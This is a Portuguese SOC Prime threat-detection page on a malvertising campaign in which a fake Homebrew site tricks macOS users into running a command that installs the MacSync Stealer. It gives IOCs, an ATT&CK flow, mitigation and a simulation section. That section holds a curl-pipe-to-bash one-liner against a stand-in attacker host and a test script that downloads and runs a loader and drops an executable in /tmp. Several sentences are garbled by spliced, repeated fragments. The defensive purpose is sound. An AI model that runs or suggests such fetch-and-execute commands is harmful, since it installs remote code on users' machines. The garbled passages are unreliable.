SOC Prime Bias: Médio

05 May 2026 14:17 UTC

Anúncio Falso do Homebrew Leva à Infecção pelo MacSync Stealer

Author Photo
SOC Prime Team linkedin icon Seguir
Anúncio Falso do Homebrew Leva à Infecção pelo MacSync Stealer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Os atacantes estão usando anúncios de busca maliciosos para direcionar usuários a um site falso do Homebrew que mira sistemas macOS com o MacSync Stealer. A página falsificada instrui as vítimas a copiar e executar um comando de shell que baixa e executa o malware. Uma vez ativo, o stealer coleta credenciais e detalhes do sistema, compacta os dados roubados em um arquivo ZIP e os envia para um servidor de comando e controle. A campanha destaca o crescente uso de malvertising para comprometer usuários de macOS.

Investigação

O analista rastreou o ataque do anúncio malicioso para uma página do Homebrew falsificada hospedada no Google Sites. Essa página apresentou um zsh comando que, ao ser executado, baixou scripts adicionais de uma infraestrutura controlada por atacantes e criou um arquivo ZIP temporário contendo dados coletados. O tráfego de rede confirmou que o arquivo foi exfiltrado para o domínio glowmedaesthetics.com. Pesquisadores documentaram os indicadores relevantes, incluindo URLs, domínios e caminhos de arquivos ligados à cadeia de infecção.

Mitigação

Os usuários devem evitar copiar e executar comandos de sites não confiáveis e devem verificar a legitimidade de páginas de gerenciadores de pacotes antes de interagir com elas. Extensões de navegador de bloqueio de anúncios ou focadas em segurança podem ajudar a reduzir a exposição a links patrocinados maliciosos. No macOS, o Gatekeeper deve permanecer habilitado e a execução de aplicações deve ser limitada a softwares confiáveis e assinados. Defensores também devem monitorar o tráfego de saída para conexões com domínios desconhecidos.

Resposta

As equipes de segurança devem detectar a execução do zsh comando suspeito e qualquer atividade curl alcançando a URL maliciosa identificada. Alertas também devem ser gerados para a criação do activity reaching the identified malicious URL. Alerts should also be generated for creation of the /tmp/osalogging.zip arquivo e para o tráfego de saída para glowmedaesthetics.com. Se houver suspeita de infecção, isole o sistema afetado, colete evidências forenses e redefina quaisquer credenciais comprometidas.

"graph TB %% Class Definitions classDef technique fill:#99ccff %% Node definitions initial_malicious_link["<b>Technique</b> – <b>T1204.001 Malicious Link</b><br/><b>Description</b>: A vítima clica em uma URL maliciosa em um anúncio e é direcionada para uma página de download falsificada do Homebrew."] class initial_malicious_link technique user_copy_paste["<b>Technique</b> – <b>T1204.004 Malicious Copy and Paste</b><br/><b>Description</b>: A vítima copia um script elaborado da página e o cola no Terminal, executando o código do atacante."] class user_copy_paste technique unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: O script Zsh roda, baixando carga adicional de glowmedaesthetics.com."] class unix_shell technique gui_input_capture["<b>Technique</b> – <b>T1056.002 GUI Input Capture</b><br/><b>Description</b>: Um pedido falso de senha gráfica captura a senha do usuário macOS."] class gui_input_capture technique local_data_staging["<b>Technique</b> – <b>T1074.001 Local Data Staging</b><br/><b>Description</b>: Informações do sistema e logs são arquivados em /tmp/osalogging.zip para exfiltração posterior."] class local_data_staging technique exfiltration_c2["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: O arquivo zip é enviado para o servidor C2 do atacante por HTTPS."] class exfiltration_c2 technique gather_software_info["<b>Technique</b> – <b>T1592.002 Software</b><br/><b>Description</b>: O script enumera softwares instalados para criar um inventário do host da vítima."] class gather_software_info technique data_local_system["<b>Technique</b> – <b>T1005 Data from Local System</b><br/><b>Description</b>: Lê arquivos locais adicionais para incluir no arquivo exfiltrado."] class data_local_system technique %% Connections initial_malicious_link –>|conduz_a| user_copy_paste user_copy_paste –>|conduz_a| unix_shell unix_shell –>|conduz_a| gui_input_capture gui_input_capture –>|conduz_a| local_data_staging local_data_staging –>|conduz_a| exfiltration_c2 local_data_staging –>|também conduz_a| gather_software_info local_data_staging –>|também conduz_a| data_local_system "

Fluxo de Ataque

Execução de Simulação

Pré-requisito: A Verificação Prévia do Telemetria e Base de Referência deve ter sido aprovada.

Fundamentação: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa do Ataque e Comandos:

    1. Armadilha Inicial: A vítima recebe um e-mail de phishing contendo um link para uma página de “tap” falsificada de Homebrew que hospeda um script de instalação malicioso.

    2. Execução: A vítima copia a linha única da página e a cola em seu terminal:

      curl -fsSL https://malicious.example.com/macsyncloader.sh | /bin/bash
      • The atividade curl alcançando a URL maliciosa identificada. Alertas também devem ser gerados para a criação do binário é invocado (corresponde à regra).
    3. Script Downloader (macsyncloader.sh):

      • Baixa a carga do MacSync via atividade curl alcançando a URL maliciosa identificada. Alertas também devem ser gerados para a criação do.
      • Escreve a carga em /tmp/.macsync e a executa.
      • Abre diálogos para roubo de credenciais (simulado via osascript no macOS, mas aqui apenas damos echo).
    4. Persistência: O script registra um LaunchAgent para rodar no login (fora do escopo da regra atual, mas relevante para uma detecção mais ampla).

  • Script de Teste de Regressão: O seguinte script Bash reproduz os passos exatos, garantindo que a telemetria se alinhe com a lógica de detecção.

    #!/usr/bin/env bash
    set -euo pipefail
    
    # -------------------------------------------------
    # Servidor simulado controlado por atacante
    # -------------------------------------------------
    MALICIOUS_HOST="https://malicious.example.com"
    LOADER="${MALICIOUS_HOST}/macsyncloader.sh"
    
    # -------------------------------------------------
    # Passo 1: Baixar e executar o loader malicioso
    # -------------------------------------------------
    echo "[*] Acionando a regra de detecção ao invocar curl ..."
    curl -fsSL "$LOADER" | /bin/bash
    
    # -------------------------------------------------
    # Passo 2: (Dentro do loader) – Carga Simulada
    # -------------------------------------------------
    # O loader normalmente seria buscado do host remoto.
    # Para o propósito deste teste, incorporamos a carga embutida.
    cat <<'PAYLOAD' > /tmp/.macsync
    #!/usr/bin/env bash
    echo "MacSync payload executado – exfiltrando informações do host..."
    # Simula captura de credenciais (sem dados reais)
    echo "Credenciais coletadas: usuario@exemplo.com / senha123"
    PAYLOAD
    
    chmod +x /tmp/.macsync
    /tmp/.macsync
    
    echo "[*] Simulação completa."
  • Comandos de Limpeza: Remova artefatos e termine quaisquer processos remanescentes.

    #!/usr/bin/env bash
    set -euo pipefail
    
    echo "[*] Limpando artefatos da simulação ..."
    rm -f /tmp/.macsync
    # Nenhum serviço persistente foi criado neste teste
    echo "[*] Limpeza finalizada."